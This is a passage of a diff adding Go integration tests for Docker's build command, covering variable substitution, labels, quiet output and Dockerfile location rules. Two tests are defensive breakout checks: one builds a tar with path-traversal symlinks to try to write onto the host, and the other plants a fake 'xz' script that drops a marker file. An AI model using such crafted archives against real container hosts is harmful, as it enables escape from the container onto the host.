FROM busybox + + ENV SOME_VAR a.b.c + + RUN [ "$SOME_VAR" = 'a.b.c' ] + RUN [ "${SOME_VAR}" = 'a.b.c' ] + RUN [ "${SOME_VAR%.*}" = 'a.b' ] + RUN [ "${SOME_VAR%%.*}" = 'a' ] + RUN [ "${SOME_VAR#*.}" = 'b.c' ] + RUN [ "${SOME_VAR##*.}" = 'c' ] + RUN [ "${SOME_VAR/c/d}" = 'a.b.d' ] + RUN [ "${#SOME_VAR}" = '5' ] + + RUN [ "${SOME_UNSET_VAR:-$SOME_VAR}" = 'a.b.c' ] + RUN [ "${SOME_VAR:+Version: ${SOME_VAR}}" = 'Version: a.b.c' ] + RUN [ "${SOME_UNSET_VAR:+${SOME_VAR}}" = '' ] + RUN [ "${SOME_UNSET_VAR:-${SOME_VAR:-d.e.f}}" = 'a.b.c' ] + `, false) + if err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildVerifySingleQuoteFails(c *check.C) { + // This testcase is supposed to generate an error because the + // JSON array we're passing in on the CMD uses single quotes instead + // of double quotes (per the JSON spec). This means we interpret it + // as a "string" instead of "JSON array" and pass it on to "sh -c" and + // it should barf on it. + name := "testbuildsinglequotefails" + + if _, err := buildImage(name, + `FROM busybox + CMD [ '/bin/sh', '-c', 'echo hi' ]`, + true); err != nil { + c.Fatal(err) + } + + if _, _, err := dockerCmdWithError("run", "--rm", name); err == nil { + c.Fatal("The image was not supposed to be able to run") + } + +} + +func (s *DockerSuite) TestBuildVerboseOut(c *check.C) { + name := "testbuildverboseout" + expected := "\n123\n" + + if daemonPlatform == "windows" { + expected = "\n123\r\n" + } + + _, out, err := buildImageWithOut(name, + `FROM busybox +RUN echo 123`, + false) + + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, expected) { + c.Fatalf("Output should contain %q: %q", "123", out) + } + +} + +func (s *DockerSuite) TestBuildWithTabs(c *check.C) { + name := "testbuildwithtabs" + _, err := buildImage(name, + "FROM busybox\nRUN echo\tone\t\ttwo", true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "ContainerConfig.Cmd") + expected1 := `["/bin/sh","-c","echo\tone\t\ttwo"]` + 
expected2 := `["/bin/sh","-c","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates + if daemonPlatform == "windows" { + expected1 = `["cmd","/S","/C","echo\tone\t\ttwo"]` + expected2 = `["cmd","/S","/C","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates + } + if res != expected1 && res != expected2 { + c.Fatalf("Missing tabs.\nGot: %s\nExp: %s or %s", res, expected1, expected2) + } +} + +func (s *DockerSuite) TestBuildLabels(c *check.C) { + name := "testbuildlabel" + expected := `{"License":"GPL","Vendor":"Acme"}` + _, err := buildImage(name, + `FROM busybox + LABEL Vendor=Acme + LABEL License GPL`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildLabelsCache(c *check.C) { + name := "testbuildlabelcache" + + id1, err := buildImage(name, + `FROM busybox + LABEL Vendor=Acme`, false) + if err != nil { + c.Fatalf("Build 1 should have worked: %v", err) + } + + id2, err := buildImage(name, + `FROM busybox + LABEL Vendor=Acme`, true) + if err != nil || id1 != id2 { + c.Fatalf("Build 2 should have worked & used cache(%s,%s): %v", id1, id2, err) + } + + id2, err = buildImage(name, + `FROM busybox + LABEL Vendor=Acme1`, true) + if err != nil || id1 == id2 { + c.Fatalf("Build 3 should have worked & NOT used cache(%s,%s): %v", id1, id2, err) + } + + id2, err = buildImage(name, + `FROM busybox + LABEL Vendor Acme`, true) // Note: " " and "=" should be same + if err != nil || id1 != id2 { + c.Fatalf("Build 4 should have worked & used cache(%s,%s): %v", id1, id2, err) + } + + // Now make sure the cache isn't used by mistake + id1, err = buildImage(name, + `FROM busybox + LABEL f1=b1 f2=b2`, false) + if err != nil { + c.Fatalf("Build 5 should have worked: %q", err) + } + + id2, err = buildImage(name, + `FROM busybox + LABEL f1="b1 f2=b2"`, true) + 
if err != nil || id1 == id2 { + c.Fatalf("Build 6 should have worked & NOT used the cache(%s,%s): %q", id1, id2, err) + } + +} + +func (s *DockerSuite) TestBuildNotVerboseSuccess(c *check.C) { + // This test makes sure that -q works correctly when build is successful: + // stdout has only the image ID (long image ID) and stderr is empty. + var stdout, stderr string + var err error + outRegexp := regexp.MustCompile("^(sha256:|)[a-z0-9]{64}\\n$") + + tt := []struct { + Name string + BuildFunc func(string) + }{ + { + Name: "quiet_build_stdin_success", + BuildFunc: func(name string) { + _, stdout, stderr, err = buildImageWithStdoutStderr(name, "FROM busybox", true, "-q", "--force-rm", "--rm") + }, + }, + { + Name: "quiet_build_ctx_success", + BuildFunc: func(name string) { + ctx, err := fakeContext("FROM busybox", map[string]string{ + "quiet_build_success_fctx": "test", + }) + if err != nil { + c.Fatalf("Failed to create context: %s", err.Error()) + } + defer ctx.Close() + _, stdout, stderr, err = buildImageFromContextWithStdoutStderr(name, ctx, true, "-q", "--force-rm", "--rm") + }, + }, + { + Name: "quiet_build_git_success", + BuildFunc: func(name string) { + git, err := newFakeGit("repo", map[string]string{ + "Dockerfile": "FROM busybox", + }, true) + if err != nil { + c.Fatalf("Failed to create the git repo: %s", err.Error()) + } + defer git.Close() + _, stdout, stderr, err = buildImageFromGitWithStdoutStderr(name, git, true, "-q", "--force-rm", "--rm") + + }, + }, + } + + for _, te := range tt { + te.BuildFunc(te.Name) + if err != nil { + c.Fatalf("Test %s shouldn't fail, but got the following error: %s", te.Name, err.Error()) + } + if outRegexp.Find([]byte(stdout)) == nil { + c.Fatalf("Test %s expected stdout to match the [%v] regexp, but it is [%v]", te.Name, outRegexp, stdout) + } + + if stderr != "" { + c.Fatalf("Test %s expected stderr to be empty, but it is [%#v]", te.Name, stderr) + } + } + +} + +func (s *DockerSuite) 
TestBuildNotVerboseFailureWithNonExistImage(c *check.C) { + // This test makes sure that -q works correctly when build fails by + // comparing between the stderr output in quiet mode and in stdout + // and stderr output in verbose mode + testRequires(c, Network) + testName := "quiet_build_not_exists_image" + buildCmd := "FROM busybox11" + _, _, qstderr, qerr := buildImageWithStdoutStderr(testName, buildCmd, false, "-q", "--force-rm", "--rm") + _, vstdout, vstderr, verr := buildImageWithStdoutStderr(testName, buildCmd, false, "--force-rm", "--rm") + if verr == nil || qerr == nil { + c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", testName)) + } + if qstderr != vstdout+vstderr { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", testName, qstderr, vstdout+vstderr)) + } +} + +func (s *DockerSuite) TestBuildNotVerboseFailure(c *check.C) { + // This test makes sure that -q works correctly when build fails by + // comparing between the stderr output in quiet mode and in stdout + // and stderr output in verbose mode + tt := []struct { + TestName string + BuildCmds string + }{ + {"quiet_build_no_from_at_the_beginning", "RUN whoami"}, + {"quiet_build_unknown_instr", "FROMD busybox"}, + } + + for _, te := range tt { + _, _, qstderr, qerr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "-q", "--force-rm", "--rm") + _, vstdout, vstderr, verr := buildImageWithStdoutStderr(te.TestName, te.BuildCmds, false, "--force-rm", "--rm") + if verr == nil || qerr == nil { + c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", te.TestName)) + } + if qstderr != vstdout+vstderr { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", te.TestName, qstderr, vstdout+vstderr)) + } + } +} + +func (s *DockerSuite) TestBuildNotVerboseFailureRemote(c *check.C) { + // This test ensures that when given a wrong URL, stderr in quiet mode and + // 
stderr in verbose mode are identical. + // TODO(vdemeester) with cobra, stdout has a carriage return too much so this test should not check stdout + URL := "http://something.invalid" + Name := "quiet_build_wrong_remote" + _, _, qstderr, qerr := buildImageWithStdoutStderr(Name, "", false, "-q", "--force-rm", "--rm", URL) + _, _, vstderr, verr := buildImageWithStdoutStderr(Name, "", false, "--force-rm", "--rm", URL) + if qerr == nil || verr == nil { + c.Fatal(fmt.Errorf("Test [%s] expected to fail but didn't", Name)) + } + if qstderr != vstderr { + c.Fatal(fmt.Errorf("Test[%s] expected that quiet stderr and verbose stdout are equal; quiet [%v], verbose [%v]", Name, qstderr, vstderr)) + } +} + +func (s *DockerSuite) TestBuildStderr(c *check.C) { + // This test just makes sure that no non-error output goes + // to stderr + name := "testbuildstderr" + _, _, stderr, err := buildImageWithStdoutStderr(name, + "FROM busybox\nRUN echo one", true) + if err != nil { + c.Fatal(err) + } + + if runtime.GOOS == "windows" && + daemonPlatform != "windows" { + // Windows to non-Windows should have a security warning + if !strings.Contains(stderr, "SECURITY WARNING:") { + c.Fatalf("Stderr contains unexpected output: %q", stderr) + } + } else { + // Other platform combinations should have no stderr written too + if stderr != "" { + c.Fatalf("Stderr should have been empty, instead it's: %q", stderr) + } + } +} + +func (s *DockerSuite) TestBuildChownSingleFile(c *check.C) { + testRequires(c, UnixCli) // test uses chown: not available on windows + testRequires(c, DaemonIsLinux) + + name := "testbuildchownsinglefile" + + ctx, err := fakeContext(` +FROM busybox +COPY test / +RUN ls -l /test +RUN [ $(ls -l /test | awk '{print $3":"$4}') = 'root:root' ] +`, map[string]string{ + "test": "test", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if err := os.Chown(filepath.Join(ctx.Dir, "test"), 4242, 4242); err != nil { + c.Fatal(err) + } + + if _, err := 
buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildSymlinkBreakout(c *check.C) { + name := "testbuildsymlinkbreakout" + tmpdir, err := ioutil.TempDir("", name) + c.Assert(err, check.IsNil) + defer os.RemoveAll(tmpdir) + ctx := filepath.Join(tmpdir, "context") + if err := os.MkdirAll(ctx, 0755); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(ctx, "Dockerfile"), []byte(` + from busybox + add symlink.tar / + add inject /symlink/ + `), 0644); err != nil { + c.Fatal(err) + } + inject := filepath.Join(ctx, "inject") + if err := ioutil.WriteFile(inject, nil, 0644); err != nil { + c.Fatal(err) + } + f, err := os.Create(filepath.Join(ctx, "symlink.tar")) + if err != nil { + c.Fatal(err) + } + w := tar.NewWriter(f) + w.WriteHeader(&tar.Header{ + Name: "symlink2", + Typeflag: tar.TypeSymlink, + Linkname: "/../../../../../../../../../../../../../../", + Uid: os.Getuid(), + Gid: os.Getgid(), + }) + w.WriteHeader(&tar.Header{ + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: filepath.Join("symlink2", tmpdir), + Uid: os.Getuid(), + Gid: os.Getgid(), + }) + w.Close() + f.Close() + if _, err := buildImageFromContext(name, fakeContextFromDir(ctx), false); err != nil { + c.Fatal(err) + } + if _, err := os.Lstat(filepath.Join(tmpdir, "inject")); err == nil { + c.Fatal("symlink breakout - inject") + } else if !os.IsNotExist(err) { + c.Fatalf("unexpected error: %v", err) + } +} + +func (s *DockerSuite) TestBuildXZHost(c *check.C) { + // /usr/local/sbin/xz gets permission denied for the user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + name := "testbuildxzhost" + + ctx, err := fakeContext(` +FROM busybox +ADD xz /usr/local/sbin/ +RUN chmod 755 /usr/local/sbin/xz +ADD test.xz / +RUN [ ! 
-e /injected ]`, + map[string]string{ + "test.xz": "\xfd\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00" + + "\x21\x01\x16\x00\x00\x00\x74\x2f\xe5\xa3\x01\x00\x3f\xfd" + + "\x37\x7a\x58\x5a\x00\x00\x04\xe6\xd6\xb4\x46\x02\x00\x21", + "xz": "#!/bin/sh\ntouch /injected", + }) + + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + +} + +func (s *DockerSuite) TestBuildVolumesRetainContents(c *check.C) { + // /foo/file gets permission denied for the user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) // TODO Windows: Issue #20127 + var ( + name = "testbuildvolumescontent" + expected = "some text" + volName = "/foo" + ) + + if daemonPlatform == "windows" { + volName = "C:/foo" + } + + ctx, err := fakeContext(` +FROM busybox +COPY content /foo/file +VOLUME `+volName+` +CMD cat /foo/file`, + map[string]string{ + "content": expected, + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, false); err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--rm", name) + if out != expected { + c.Fatalf("expected file contents for /foo/file to be %q but received %q", expected, out) + } + +} + +func (s *DockerSuite) TestBuildRenamedDockerfile(c *check.C) { + + ctx, err := fakeContext(`FROM busybox + RUN echo from Dockerfile`, + map[string]string{ + "Dockerfile": "FROM busybox\nRUN echo from Dockerfile", + "files/Dockerfile": "FROM busybox\nRUN echo from files/Dockerfile", + "files/dFile": "FROM busybox\nRUN echo from files/dFile", + "dFile": "FROM busybox\nRUN echo from dFile", + "files/dFile2": "FROM busybox\nRUN echo from files/dFile2", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") + if err != nil { + c.Fatalf("Failed to build: %s\n%s", out, err) + } + if !strings.Contains(out, "from Dockerfile") { + 
c.Fatalf("test1 should have used Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-f", filepath.Join("files", "Dockerfile"), "-t", "test2", ".") + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, "from files/Dockerfile") { + c.Fatalf("test2 should have used files/Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", filepath.Join("files", "dFile")), "-t", "test3", ".") + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, "from files/dFile") { + c.Fatalf("test3 should have used files/dFile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--file=dFile", "-t", "test4", ".") + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, "from dFile") { + c.Fatalf("test4 should have used dFile, output:%s", out) + } + + dirWithNoDockerfile, err := ioutil.TempDir(os.TempDir(), "test5") + c.Assert(err, check.IsNil) + nonDockerfileFile := filepath.Join(dirWithNoDockerfile, "notDockerfile") + if _, err = os.Create(nonDockerfileFile); err != nil { + c.Fatal(err) + } + out, _, err = dockerCmdInDir(c, ctx.Dir, "build", fmt.Sprintf("--file=%s", nonDockerfileFile), "-t", "test5", ".") + + if err == nil { + c.Fatalf("test5 was supposed to fail to find passwd") + } + + if expected := fmt.Sprintf("The Dockerfile (%s) must be within the build context (.)", nonDockerfileFile); !strings.Contains(out, expected) { + c.Fatalf("wrong error message:%v\nexpected to contain=%v", out, expected) + } + + out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test6", "..") + if err != nil { + c.Fatalf("test6 failed: %s", err) + } + if !strings.Contains(out, "from Dockerfile") { + c.Fatalf("test6 should have used root Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join(ctx.Dir, "files", "Dockerfile"), 
"-t", "test7", "..") + if err != nil { + c.Fatalf("test7 failed: %s", err) + } + if !strings.Contains(out, "from files/Dockerfile") { + c.Fatalf("test7 should have used files Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", filepath.Join("..", "Dockerfile"), "-t", "test8", ".") + if err == nil || !strings.Contains(out, "must be within the build context") { + c.Fatalf("test8 should have failed with Dockerfile out of context: %s", err) + } + + tmpDir := os.TempDir() + out, _, err = dockerCmdInDir(c, tmpDir, "build", "-t", "test9", ctx.Dir) + if err != nil { + c.Fatalf("test9 - failed: %s", err) + } + if !strings.Contains(out, "from Dockerfile") { + c.Fatalf("test9 should have used root Dockerfile, output:%s", out) + } + + out, _, err = dockerCmdInDir(c, filepath.Join(ctx.Dir, "files"), "build", "-f", "dFile2", "-t", "test10", ".") + if err != nil { + c.Fatalf("test10 should have worked: %s", err) + } + if !strings.Contains(out, "from files/dFile2") { + c.Fatalf("test10 should have used files/dFile2, output:%s", out) + } + +} + +func (s *DockerSuite) TestBuildFromMixedcaseDockerfile(c *check.C) { + testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows + testRequires(c, DaemonIsLinux) + + ctx, err := fakeContext(`FROM busybox + RUN echo from dockerfile`, + map[string]string{ + "dockerfile": "FROM busybox\nRUN echo from dockerfile", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") + if err != nil { + c.Fatalf("Failed to build: %s\n%s", out, err) + } + + if !strings.Contains(out, "from dockerfile") { + c.Fatalf("Missing proper output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildWithTwoDockerfiles(c *check.C) { + testRequires(c, UnixCli) // Dockerfile overwrites dockerfile on windows + testRequires(c, DaemonIsLinux) + + ctx, err := fakeContext(`FROM busybox +RUN echo from Dockerfile`, + 
map[string]string{ + "dockerfile": "FROM busybox\nRUN echo from dockerfile", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", "test1", ".") + if err != nil { + c.Fatalf("Failed to build: %s\n%s", out, err) + } + + if !strings.Contains(out, "from Dockerfile") { + c.Fatalf("Missing proper output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildFromURLWithF(c *check.C) { + server, err := fakeStorage(map[string]string{"baz": `FROM busybox +RUN echo from baz +COPY * /tmp/ +RUN find /tmp/`}) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(`FROM busybox +RUN echo from Dockerfile`, + map[string]string{}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + // Make sure that -f is ignored and that we don't use the Dockerfile + // that's in the current dir + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-f", "baz", "-t", "test1", server.URL()+"/baz") + if err != nil { + c.Fatalf("Failed to build: %s\n%s", out, err) + } + + if !strings.Contains(out, "from baz") || + strings.Contains(out, "/tmp/baz") || + !strings.Contains(out, "/tmp/Dockerfile") { + c.Fatalf("Missing proper output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildFromStdinWithF(c *check.C) { + testRequires(c, DaemonIsLinux) // TODO Windows: This test is flaky; no idea why + ctx, err := fakeContext(`FROM busybox +RUN echo "from Dockerfile"`, + map[string]string{}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + // Make sure that -f is ignored and that we don't use the Dockerfile + // that's in the current dir + dockerCommand := exec.Command(dockerBinary, "build", "-f", "baz", "-t", "test1", "-") + dockerCommand.Dir = ctx.Dir + dockerCommand.Stdin = strings.NewReader(`FROM busybox +RUN echo "from baz" +COPY * /tmp/ +RUN sh -c "find /tmp/" # sh -c is needed on Windows to use the correct find`) + out, status, err := runCommandWithOutput(dockerCommand) + if err != 
nil || status != 0 { + c.Fatalf("Error building: %s", err) + } + + if !strings.Contains(out, "from baz") || + strings.Contains(out, "/tmp/baz") || + !strings.Contains(out, "/tmp/Dockerfile") { + c.Fatalf("Missing proper output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildFromOfficialNames(c *check.C) { + name := "testbuildfromofficial" + fromNames := []string{ + "busybox", + "docker.io/busybox", + "index.docker.io/busybox", + "library/busybox", + "docker.io/library/busybox", + "index.docker.io/library/busybox", + } + for idx, fromName := range fromNames { + imgName := fmt.Sprintf("%s%d", name, idx) + _, err := buildImage(imgName, "FROM "+fromName, true) + if err != nil { + c.Errorf("Build failed using FROM %s: %s", fromName, err) + } + deleteImages(imgName) + } +} + +func (s *DockerSuite) TestBuildDockerfileOutsideContext(c *check.C) { + testRequires(c, UnixCli) // uses os.Symlink: not implemented in windows at the time of writing (go-1.4.2) + testRequires(c, DaemonIsLinux) + + name := "testbuilddockerfileoutsidecontext" + tmpdir, err := ioutil.TempDir("", name) + c.Assert(err, check.IsNil) + defer os.RemoveAll(tmpdir) + ctx := filepath.Join(tmpdir, "context") + if err := os.MkdirAll(ctx, 0755); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(ctx, "Dockerfile"), []byte("FROM scratch\nENV X Y"), 0644); err != nil { + c.Fatal(err) + } + wd, err := os.Getwd() + if err != nil { + c.Fatal(err) + } + defer os.Chdir(wd) + if err := os.Chdir(ctx); err != nil { + c.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(tmpdir, "outsideDockerfile"), []byte("FROM scratch\nENV x y"), 0644); err != nil { + c.Fatal(err) + } + if err := os.Symlink(filepath.Join("..", "outsideDockerfile"), filepath.Join(ctx, "dockerfile1")); err != nil { + c.Fatal(err) + } + if err := os.Symlink(filepath.Join(tmpdir, "outsideDockerfile"), filepath.Join(ctx, "dockerfile2")); err != nil { + c.Fatal(err) + } + + for _, dockerfilePath := range []string{ + 
filepath.Join("..", "outsideDockerfile"), + filepath.Join(ctx, "dockerfile1"), + filepath.Join(ctx, "dockerfile2"), + } { + result := dockerCmdWithResult("build", "-t", name, "--no-cache", "-f", dockerfilePath, ".") + c.Assert(result, icmd.Matches, icmd.Expected{ + Err: "must be within the build context", + ExitCode: 1, + }) + deleteImages(name) + } + + os.Chdir(tmpdir) + + // Path to Dockerfile should be resolved relative to working directory, not relative to context. + // There is a Dockerfile in the context, but since there is no Dockerfile in the current directory, the following should fail + out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "Dockerfile", ctx) + if err == nil { + c.Fatalf("Expected error. Out: %s", out) + } +} + +func (s *DockerSuite) TestBuildSpaces(c *check.C) { + // Test to make sure that leading/trailing spaces on a command + // doesn't change the error msg we get + var ( + err1 error + err2 error + ) + + name := "testspaces" + ctx, err := fakeContext("FROM busybox\nCOPY\n", + map[string]string{ + "Dockerfile": "FROM busybox\nCOPY\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err1 = buildImageFromContext(name, ctx, false); err1 == nil { + c.Fatal("Build 1 was supposed to fail, but didn't") + } + + ctx.Add("Dockerfile", "FROM busybox\nCOPY ") + if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { + c.Fatal("Build 2 was supposed to fail, but didn't") + } + + removeLogTimestamps := func(s string) string { + return regexp.MustCompile(`time="(.*?)"`).ReplaceAllString(s, `time=[TIMESTAMP]`) + } + + // Skip over the times + e1 := removeLogTimestamps(err1.Error()) + e2 := removeLogTimestamps(err2.Error()) + + // Ignore whitespace since that's what were verifying doesn't change stuff + if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { + c.Fatalf("Build 2's error wasn't the same as build 1's\n1:%s\n2:%s", err1, err2) + } + + ctx.Add("Dockerfile", "FROM 
busybox\n COPY") + if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { + c.Fatal("Build 3 was supposed to fail, but didn't") + } + + // Skip over the times + e1 = removeLogTimestamps(err1.Error()) + e2 = removeLogTimestamps(err2.Error()) + + // Ignore whitespace since that's what were verifying doesn't change stuff + if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { + c.Fatalf("Build 3's error wasn't the same as build 1's\n1:%s\n3:%s", err1, err2) + } + + ctx.Add("Dockerfile", "FROM busybox\n COPY ") + if _, err2 = buildImageFromContext(name, ctx, false); err2 == nil { + c.Fatal("Build 4 was supposed to fail, but didn't") + } + + // Skip over the times + e1 = removeLogTimestamps(err1.Error()) + e2 = removeLogTimestamps(err2.Error()) + + // Ignore whitespace since that's what were verifying doesn't change stuff + if strings.Replace(e1, " ", "", -1) != strings.Replace(e2, " ", "", -1) { + c.Fatalf("Build 4's error wasn't the same as build 1's\n1:%s\n4:%s", err1, err2) + } + +} + +func (s *DockerSuite) TestBuildSpacesWithQuotes(c *check.C) { + // Test to make sure that spaces in quotes aren't lost + name := "testspacesquotes" + + dockerfile := `FROM busybox +RUN echo " \ + foo "` + + _, out, err := buildImageWithOut(name, dockerfile, false) + if err != nil { + c.Fatal("Build failed:", err) + } + + expecting := "\n foo \n" + // Windows uses the builtin echo, which preserves quotes + if daemonPlatform == "windows" { + expecting = "\" foo \"" + } + if !strings.Contains(out, expecting) { + c.Fatalf("Bad output: %q expecting to contain %q", out, expecting) + } + +} + +// #4393 +func (s *DockerSuite) TestBuildVolumeFileExistsinContainer(c *check.C) { + testRequires(c, DaemonIsLinux) // TODO Windows: This should error out + buildCmd := exec.Command(dockerBinary, "build", "-t", "docker-test-errcreatevolumewithfile", "-") + buildCmd.Stdin = strings.NewReader(` + FROM busybox + RUN touch /foo + VOLUME /foo + `) + + out, _, err := 
runCommandWithOutput(buildCmd) + if err == nil || !strings.Contains(out, "file exists") { + c.Fatalf("expected build to fail when file exists in container at requested volume path") + } + +} + +func (s *DockerSuite) TestBuildMissingArgs(c *check.C) { + // Test to make sure that all Dockerfile commands (except the ones listed + // in skipCmds) will generate an error if no args are provided. + // Note: INSERT is deprecated so we exclude it because of that. + skipCmds := map[string]struct{}{ + "CMD": {}, + "RUN": {}, + "ENTRYPOINT": {}, + "INSERT": {}, + } + + if daemonPlatform == "windows" { + skipCmds = map[string]struct{}{ + "CMD": {}, + "RUN": {}, + "ENTRYPOINT": {}, + "INSERT": {}, + "STOPSIGNAL": {}, + "ARG": {}, + "USER": {}, + "EXPOSE": {}, + } + } + + for cmd := range command.Commands { + cmd = strings.ToUpper(cmd) + if _, ok := skipCmds[cmd]; ok { + continue + } + + var dockerfile string + if cmd == "FROM" { + dockerfile = cmd + } else { + // Add FROM to make sure we don't complain about it missing + dockerfile = "FROM busybox\n" + cmd + } + + ctx, err := fakeContext(dockerfile, map[string]string{}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + var out string + if out, err = buildImageFromContext("args", ctx, true); err == nil { + c.Fatalf("%s was supposed to fail. 
Out:%s", cmd, out) + } + if !strings.Contains(err.Error(), cmd+" requires") { + c.Fatalf("%s returned the wrong type of error:%s", cmd, err) + } + } + +} + +func (s *DockerSuite) TestBuildEmptyScratch(c *check.C) { + testRequires(c, DaemonIsLinux) + _, out, err := buildImageWithOut("sc", "FROM scratch", true) + if err == nil { + c.Fatalf("Build was supposed to fail") + } + if !strings.Contains(out, "No image was generated") { + c.Fatalf("Wrong error message: %v", out) + } +} + +func (s *DockerSuite) TestBuildDotDotFile(c *check.C) { + ctx, err := fakeContext("FROM busybox\n", + map[string]string{ + "..gitme": "", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err = buildImageFromContext("sc", ctx, false); err != nil { + c.Fatalf("Build was supposed to work: %s", err) + } +} + +func (s *DockerSuite) TestBuildRUNoneJSON(c *check.C) { + testRequires(c, DaemonIsLinux) // No hello-world Windows image + name := "testbuildrunonejson" + + ctx, err := fakeContext(`FROM hello-world:frozen +RUN [ "/hello" ]`, map[string]string{}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "-t", name, ".") + if err != nil { + c.Fatalf("failed to build the image: %s, %v", out, err) + } + + if !strings.Contains(out, "Hello from Docker") { + c.Fatalf("bad output: %s", out) + } + +} + +func (s *DockerSuite) TestBuildEmptyStringVolume(c *check.C) { + name := "testbuildemptystringvolume" + + _, err := buildImage(name, ` + FROM busybox + ENV foo="" + VOLUME $foo + `, false) + if err == nil { + c.Fatal("Should have failed to build") + } + +} + +func (s *DockerSuite) TestBuildContainerWithCgroupParent(c *check.C) { + testRequires(c, SameHostDaemon) + testRequires(c, DaemonIsLinux) + + cgroupParent := "test" + data, err := ioutil.ReadFile("/proc/self/cgroup") + if err != nil { + c.Fatalf("failed to read '/proc/self/cgroup - %v", err) + } + selfCgroupPaths := parseCgroupPaths(string(data)) + _, 
found := selfCgroupPaths["memory"] + if !found { + c.Fatalf("unable to find self memory cgroup path. CgroupsPath: %v", selfCgroupPaths) + } + cmd := exec.Command(dockerBinary, "build", "--cgroup-parent", cgroupParent, "-") + cmd.Stdin = strings.NewReader(` +FROM busybox +RUN cat /proc/self/cgroup +`) + + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) + } + m, err := regexp.MatchString(fmt.Sprintf("memory:.*/%s/.*", cgroupParent), out) + c.Assert(err, check.IsNil) + if !m { + c.Fatalf("There is no expected memory cgroup with parent /%s/: %s", cgroupParent, out) + } +} + +func (s *DockerSuite) TestBuildNoDupOutput(c *check.C) { + // Check to make sure our build output prints the Dockerfile cmd + // property - there was a bug that caused it to be duplicated on the + // Step X line + name := "testbuildnodupoutput" + + _, out, err := buildImageWithOut(name, ` + FROM busybox + RUN env`, false) + if err != nil { + c.Fatalf("Build should have worked: %q", err) + } + + exp := "\nStep 2/2 : RUN env\n" + if !strings.Contains(out, exp) { + c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, exp) + } +} + +// GH15826 +func (s *DockerSuite) TestBuildStartsFromOne(c *check.C) { + // Explicit check to ensure that build starts from step 1 rather than 0 + name := "testbuildstartsfromone" + + _, out, err := buildImageWithOut(name, ` + FROM busybox`, false) + if err != nil { + c.Fatalf("Build should have worked: %q", err) + } + + exp := "\nStep 1/1 : FROM busybox\n" + if !strings.Contains(out, exp) { + c.Fatalf("Bad output\nGot:%s\n\nExpected to contain:%s\n", out, 